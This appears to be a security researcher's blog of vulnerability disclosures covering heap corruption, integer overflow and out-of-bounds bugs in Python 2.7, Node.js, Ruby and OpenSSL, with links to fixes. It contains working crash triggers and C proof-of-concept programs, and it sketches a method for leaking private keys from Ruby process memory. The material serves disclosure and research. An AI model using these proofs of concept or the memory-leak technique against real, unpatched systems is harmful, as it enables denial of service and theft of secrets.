Python 2.7 32-bit heap corruption in JSON encoder

The ascii_escape_str and ascii_escape_unicode functions in Python 2.7 were prone to a heap corruption vulnerability. Several code paths reach these functions and trigger the vulnerability; one of them is encoding a dict object with a very large key:

python -c 'import json;json.dumps({chr(0x22)*0x2AAAAAAB:0})'

A fix has been implemented: https://hg.python.org/cpython/rev/9375c8834448

Node.js memory corruption from JavaScript as a feature

Update 26 Sept 2016: a fix is being prepared at https://github.com/nodejs/node/issues/8724

As I was casually browsing the NodeJS 6.6.0 source code I stumbled upon this suspect piece of code.

src/node_buffer.cc:

template <typename T, enum Endianness endianness>
void WriteFloatGeneric(const FunctionCallbackInfo<Value>& args) {
  Environment* env = Environment::GetCurrent(args);

  bool should_assert = args.Length() < 4;

  if (should_assert) {
    THROW_AND_RETURN_UNLESS_BUFFER(env, args[0]);
  }

  Local<Uint8Array> ts_obj = args[0].As<Uint8Array>();
  ArrayBuffer::Contents ts_obj_c = ts_obj->Buffer()->GetContents();
  const size_t ts_obj_offset = ts_obj->ByteOffset();
  const size_t ts_obj_length = ts_obj->ByteLength();
  char* const ts_obj_data =
      static_cast<char*>(ts_obj_c.Data()) + ts_obj_offset;
  if (ts_obj_length > 0)
    CHECK_NE(ts_obj_data, nullptr);

  T val = args[1]->NumberValue(env->context()).FromMaybe(0);
  size_t offset = args[2]->IntegerValue(env->context()).FromMaybe(0);

  size_t memcpy_num = sizeof(T);

  if (should_assert) {
    CHECK_NOT_OOB(offset + memcpy_num >= memcpy_num);
    CHECK_NOT_OOB(offset + memcpy_num <= ts_obj_length);
  }

  if (offset + memcpy_num > ts_obj_length)
    memcpy_num = ts_obj_length - offset;

  union NoAlias {
    T val;
    char bytes[sizeof(T)];
  };

  union NoAlias na = { val };
  char* ptr = static_cast<char*>(ts_obj_data) + offset;
  if (endianness != GetEndianness())
    Swizzle(na.bytes, sizeof(na.bytes));
  memcpy(ptr, na.bytes, memcpy_num);
}

As you can see, should_assert is set to false when there is a 4th parameter.
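
The effect of skipping those checks can be modelled with plain integer arithmetic. What follows is a rough Python sketch, not Node code: it assumes a 64-bit size_t, and the function name write_float_model as well as the offsets passed to it are made up for illustration.

```python
MASK64 = (1 << 64) - 1  # assumption: size_t is 64 bits wide


def write_float_model(buf_len, offset, no_assert, size_of_t=4):
    """Return the (offset, byte count) that memcpy would receive."""
    offset &= MASK64
    memcpy_num = size_of_t
    end = (offset + memcpy_num) & MASK64  # unsigned addition may wrap
    if not no_assert:
        # Mirrors the two CHECK_NOT_OOB lines; only run without a 4th argument.
        if end < memcpy_num or end > buf_len:
            raise IndexError("out of range index")
    if end > buf_len:
        # Meant to truncate a write that straddles the end of the buffer,
        # but wraps to a huge count once offset itself exceeds buf_len.
        memcpy_num = (buf_len - offset) & MASK64
    return offset, memcpy_num


print(write_float_model(10, 8, True))     # straddles the end: count is truncated
print(write_float_model(10, 1000, True))  # far past the end: count wraps around
```

In this model, an offset that lies beyond the buffer turns the "truncated" byte count into a value close to 2^64, and the destination pointer is already out of bounds before memcpy is called.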

This is what the documentation says about it:

https://nodejs.org/api/buffer.html#buffer_buf_writefloatbe_value_offset_noassert

buf.writeFloatBE(value, offset[, noAssert])
buf.writeFloatLE(value, offset[, noAssert])
Added in: v0.11.15

    value <Number> Number to be written to buf
    offset <Integer> Where to start writing. Must satisfy: 0 <= offset <= buf.length - 4
    noAssert <Boolean> Skip value and offset validation? Default: false
    Return: <Integer> offset plus the number of bytes written

Writes value to buf at the specified offset with specified endian format (writeFloatBE() writes big endian, writeFloatLE() writes little endian). value should be a valid 32-bit float. Behavior is undefined when value is anything other than a 32-bit float.

Setting noAssert to true allows the encoded form of value to extend beyond the end of buf, but the result should be considered undefined behavior.

So it’s not a bug but a feature.

Let’s try it on 64 bit:

node-v6.6.0$ ./node -e 'new Buffer(10).writeFloatBE(1, 0xFFFFFFFFFFFFFFFF-3000, 1);'
Segmentation fault

Groovy!

Disclaimer: I never use NodeJS and I know next to nothing about it. Maybe there is a good use for this “feature” (but what?), but other popular high-level languages have a zero-tolerance policy with regard to raw memory corruption from scripts (see the Python, Ruby, Perl and PHP vulnerabilities in the Internet Bug Bounty program).

Ruby vulnerability: heap corruption in string.c tr_trans() due to undersized buffer

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/cc9f1e919518edbee41d602ce215175f52f8f5f5

Configure with AddressSanitizer (ASAN):

mkdir install; CFLAGS="-fsanitize=address" ./configure \
    --disable-install-doc --disable-install-rdoc --disable-install-capi \
    --prefix=`realpath ./install` && make -j4 && make install

Then execute:

$ ./ruby -e '"a".encode("utf-32").tr("b".encode("utf-32"),
"c".encode("utf-32"))'
=================================================================
==17122==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x602000014a98 at pc 0x7ff04065cf01 bp 0x7ffdfe7629b0 sp 0x7ffdfe7629a8
WRITE of size 4 at 0x602000014a98 thread T0
...
...

The actual corruption occurs here (string.c, line 6196):

    TERM_FILL(t, rb_enc_mbminlen(enc));

Ruby vulnerability: heap corruption in DateTime.strftime() on 32 bit for certain format strings

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/58e8c9c895cc21473d6e46978666016a6e627d5f

When a very high precision is set in the date_strftime_with_tmx()
function, the following check (in the STRFTIME macro in date_strftime.c)
does not work as expected if s >= 0x80000000, because on 32 bit the sum
s + precision can then wrap around:

        if (start + maxsize < s + precision) {          \
            errno = ERANGE;                             \
            return 0;                                   \
        }
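
To make the wraparound concrete, here is a small Python model of that comparison. It is only a sketch: it assumes 32-bit pointers that wrap on overflow, the addresses are hypothetical, and range_check_fires is a name invented for this example.

```python
MASK32 = 0xFFFFFFFF  # assumption: 32-bit pointers and size_t


def range_check_fires(start, maxsize, s, precision, wrap=True):
    """Evaluate `start + maxsize < s + precision`, optionally with 32-bit wraparound."""
    lhs = start + maxsize
    rhs = s + precision
    if wrap:
        lhs &= MASK32
        rhs &= MASK32
    return lhs < rhs


start = 0x80001000  # hypothetical address of the output buffer
s = start           # nothing has been written yet
print(range_check_fires(start, 1024, s, 2147483647, wrap=False))  # ideal arithmetic
print(range_check_fires(start, 1024, s, 2147483647, wrap=True))   # 32-bit arithmetic
```

With unbounded integers the check fires and ERANGE would be returned; with 32-bit wraparound the right-hand side becomes a small number, the check is skipped, and the oversized precision is used.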

This code causes a crash on my 32 bit system:

require 'date'
DateTime.now.strftime("%2147483647c")

64 bit is probably not affected (technically possible, but
unlikely).

Ruby vulnerability: StringIO strio_getline() may divulge arbitrary process memory

Originally reported privately to Ruby on 4 Jun 2016
Testing was done on Ruby 2.3.1 in 32 bit VM
Ruby has expressly allowed me to talk publicly about this issue while a fix is being prepared

The problem is this line in ext/stringio/stringio.c strio_getline():

1002     if (limit > 0 && s + limit < e) {
1003     e = rb_enc_right_char_head(s, s + limit, e, get_enc(ptr));
1004     }

This works as intended as long as the sum of s (pointer) and limit
(long) doesn’t overflow. So if on a 32 bit system ‘s’ happens to be
0xBF000000, and limit is 0x7FFFFFFF, the sum of both values is
0x3EFFFFFF, which is a completely unrelated address. From there, there
are several paths to be chosen from based on what the first parameter to
the function is (‘str’).
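
The arithmetic can be checked with a few lines of Python. This is a sketch that assumes 32-bit pointers wrapping modulo 2^32; limit_check is a made-up helper name, and the buffer is taken to hold the four bytes "abc\n".

```python
MASK32 = 0xFFFFFFFF  # assumption: 32-bit address space, wrapping on overflow


def limit_check(s, e, limit):
    """Return (wrapped s + limit, whether `limit > 0 && s + limit < e` holds)."""
    end = (s + limit) & MASK32
    return end, (limit > 0 and end < e)


s = 0xBF000000
e = s + 4  # end of a 4-byte buffer such as "abc\n"

for limit in (2, 100, 0x7FFFFFFF):
    end, taken = limit_check(s, e, limit)
    print(hex(limit), hex(end), taken)
```

A limit of 2 legitimately passes the check, a limit of 100 is rejected because it points past e, and 0x7FFFFFFF passes again only because the sum wrapped to 0x3EFFFFFF.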

  1005      if (NIL_P(str)) {
            ...
            ...
  1008      else if ((n = RSTRING_LEN(str)) == 0) {
            ...
            ...
  1024      else if (n == 1) {
            ...
            ...
  1030      else {
            ...
            ...

All these paths eventually call strio_substr(). A wrong ‘pos’ parameter
to this function is not possible because it was checked earlier:

   996      if (ptr->pos >= (n = RSTRING_LEN(ptr->string))) {
   997      return Qnil;
   998      }

A wrong len parameter to this function doesn’t matter either, as the
function corrects it itself:

    98  static VALUE
    99  strio_substr(struct StringIO *ptr, long pos, long len)
   100  {
   101      VALUE str = ptr->string;
   102      rb_encoding *enc = get_enc(ptr);
   103      long rlen = RSTRING_LEN(str) - pos;
   104  
   105      if (len > rlen) len = rlen;
   106      if (len < 0) len = 0;
   107      if (len == 0) return rb_str_new(0,0);
   108      return rb_enc_str_new(RSTRING_PTR(str)+pos, len, enc);
   109  }
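
The clamping is easy to mirror in Python. This is only a model of the length handling (strio_substr_model is an invented name, and encodings are ignored):

```python
def strio_substr_model(string, pos, length):
    """Mimic the len clamping in strio_substr for a bytes buffer."""
    rlen = len(string) - pos
    if length > rlen:
        length = rlen  # never read past the end of the string
    if length < 0:
        length = 0     # negative lengths yield an empty result
    return string[pos:pos + length]


print(strio_substr_model(b"abc\n", 0, 0x7FFFFFFF))
print(strio_substr_model(b"abc\n", 1, -5))
```

Whatever len is passed in, the result stays within the string, so strio_substr itself does not read out of bounds.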

As for the first path (str is nil, line 1005), it will call
strio_substr() with an invalid len value, which doesn’t matter because
strio_substr() corrects it:

  1005      if (NIL_P(str)) {
  1006      str = strio_substr(ptr, ptr->pos, e - s);
  1007      }

Within the second path (str is an empty string, line 1008), there is
the risk of an OOB read, because this routine’s logic is based on
the belief that ‘e’ denotes the end of the buffer. ‘p’ will never reach
‘e’ because either 1) a null pointer dereference occurs (once it
reads at address 0x00000000) or 2) no \n character is found before p
reaches an invalid memory page. In theory an attacker could use this
mishap to find the \n character at various places in memory (by
adjusting the ‘limit’ variable), but that is usually not very useful.
(How an attacker can learn the position at which the \n character was
found will become clear later.)

  1009      p = s;
  1010      while (*p == '\n') {
  1011          if (++p == e) {
  1012          return Qnil;
  1013          }
  1014      }
  1015      s = p;
  1016      while ((p = memchr(p, '\n', e - p)) && (p != e)) {
  1017          if (*++p == '\n') {
  1018          e = p + 1;
  1019          break;
  1020          }
  1021      }
  1022      str = strio_substr(ptr, s - RSTRING_PTR(ptr->string), e - s);

The third path (str is one character long, line 1024) is similar to the
second path, except that memchr searches for the character given in str:

  1025      if ((p = memchr(s, RSTRING_PTR(str)[0], e - s)) != 0) {
  1026          e = p + 1;
  1027      }
  1028      str = strio_substr(ptr, ptr->pos, e - s);

The fourth path is entered if str is two or more bytes long (line
1030). The first condition is always true if a very high ‘limit’ value
is chosen (the premise of this vulnerability):

  1031      if (n < e - s) {

The condition of the first subpath is never true in this case:

  1032          if (e - s < 1024) {

So the second subpath is entered. This can be used to find the arbitrary
string str across the totality of virtual memory:

  1040          else {
  1041          long skip[1 << CHAR_BIT], pos;
  1042          p = RSTRING_PTR(str);
  1043          bm_init_skip(skip, p, n);
  1044          if ((pos = bm_search(p, n, s, e - s, skip)) >= 0) {
  1045              e = s + pos + n;
  1046          }
  1047          }

After any of these paths have been traversed, the attacker can read the
pos attribute to get the relative location of the string that has been
found somewhere in memory:

  1051      ptr->pos = e - RSTRING_PTR(ptr->string);

By subtracting this current pos from the previous pos, the attacker
can learn the position of the string that was searched for, relative to
the base string.

My hypothesis is that, if we assume that the attacker can control the
‘limit’ variable as well as the string that is searched for, and that
they can invoke strio_getline an arbitrary number of times, they can
make Ruby divulge arbitrary information such as private keys (if they
are loaded in memory), by searching for BEGIN PGP PRIVATE KEY BLOCK
and adjusting the limit parameter in combination with all alphanumeric
characters to deduce the entire base64-encoded private key.
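
The idea can be illustrated with a toy model in Python. Nothing here touches Ruby: the memory layout, the "KEY:" marker and the helper names are invented for this sketch, and bytes.find stands in for the out-of-bounds bm_search. In the real function a miss would leave pos at a large bogus value rather than return None.

```python
import string

# Toy "process memory": the StringIO buffer lives at BASE and an unrelated
# secret sits further along. Layout and contents are invented for this sketch.
MEMORY = bytearray(4096)
BASE = 256
MEMORY[BASE:BASE + 4] = b"abc\n"
SECRET = b"KEY:c2VjcmV0;"
MEMORY[2048:2048 + len(SECRET)] = SECRET


def leaky_gets(needle):
    """Model gets(needle, huge_limit): return the resulting pos, or None on a miss."""
    hit = bytes(MEMORY).find(needle, BASE)  # stand-in for bm_search past the buffer
    if hit < 0:
        return None
    return hit + len(needle) - BASE  # like ptr->pos = e - RSTRING_PTR(ptr->string)


def recover(marker, alphabet, terminator):
    """Extend a known marker one byte at a time, using leaky_gets as an oracle."""
    known = marker
    while not known.endswith(terminator):
        for c in alphabet:
            candidate = known + bytes([c])
            if leaky_gets(candidate) is not None:
                known = candidate
                break
        else:
            break  # no candidate matched; give up
    return known


alphabet = (string.ascii_letters + string.digits + ";").encode()
print(leaky_gets(b"KEY:"))  # end of the marker, relative to the base string
print(recover(b"KEY:", alphabet, b";"))
```

Each successful search confirms one more byte of the secret, so the number of calls grows only linearly with the length of the data being recovered.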

Note that a pointer address can naturally be very high (on 32 bit
anyway), such as 0xFFFF0000. In that event, a limit of 0x10000 can be
enough to overflow this computation:

1002     if (limit > 0 && s + limit < e) {

Here is code that can be used to trigger the vulnerability.

require "stringio"
s = StringIO.new
s.puts("abc")
s.rewind()
x = s.gets('xxx', 0x7FFFFFF0)
puts(s.pos)

The vulnerability is more likely to trigger on 32 bit than on 64 bit,
since the chance that the base string is allocated in the upper half of
the virtual address space (0x80000000 or above, like 0xBF000000 in my
initial example) is much higher on 32 bit than on 64 bit (where it needs
to be allocated at 0x8000000000000000 or above). I did all of my testing
on 32 bit.

OpenSSL X509_NAME_oneline memory corruption issues

Memory corruption due to oversized input:

#include <openssl/x509.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 536870912;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 0x01, stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    X509_NAME_oneline(name, 0, 0);
}

Proof that X509_NAME_oneline writes to buffer despite the len parameter being 0:

#include <openssl/x509.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 1024;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 'x', stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    // Fictional buf ptr -- but wouldn't crash
    // if X509_NAME_oneline would adhere to the
    // fact that length is 0
    X509_NAME_oneline(name, (char*)1, 0);
}

OpenSSL: double-free after memory allocation in d2i_ASN1_bytes fails

#include <openssl/asn1.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    ASN1_STRING* a = ASN1_STRING_new();
    ASN1_STRING* b;
    unsigned char* pp;

    ASN1_STRING_set(a, "aa", -1);
    pp = malloc(0x80000000);
    if ( !pp )
    {
        printf("Allocation failure\n");
        return 0;
    }
    pp[0] = 0x01;
    pp[1] = 0x84;
    pp[2] = 0x7F;
    pp[3] = 0xFF;
    pp[4] = 0xFF;
    pp[5] = 0xFA;
    b = d2i_ASN1_bytes(&a, (const unsigned char**)&pp, 0x80000000, 1, 0);
    ASN1_STRING_free(a);

    return 0;
}

Compile and run with a virtual memory limit:

gcc d2i_ASN1_bytes_double_free.c -lcrypto; ulimit -v 4194304; ./a.out